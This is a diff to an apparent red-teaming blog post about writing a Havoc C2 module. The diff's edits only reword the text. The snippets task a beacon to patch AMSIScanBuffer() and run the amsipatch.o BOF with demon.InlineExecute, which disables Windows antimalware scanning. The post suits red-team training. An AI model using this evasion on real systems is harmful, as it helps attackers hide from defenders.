yl-labs/yl-labs.github.io/_posts/2025-03-18-red-reaming-havoc-c2.md

         return
 ```

-We provide the user with a debug message in the console.
+Next, we provide the user with a debug message in the console.

 ```
 TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked beacon to patch AMSIScanBuffer()" )
 ```

-Initiate the Packer.
+Making sure to initiate the Packer.

 ```
 Task = Packer()
 ```

-Provide information to Havoc on what to do to execute the module.
-In this case, the concerned BOF is located in the `amsipatch.o` file and its entry point is at the `go` function.
+And lastly, provide the information to Havoc on what to do to execute the module.
+In this case, our *BOF* will be located in the `amsipatch.o` file and its entry point will be at the `go` function.

 ```
 demon.InlineExecute( TaskID, "go", f"amsipatch.o",b'', False)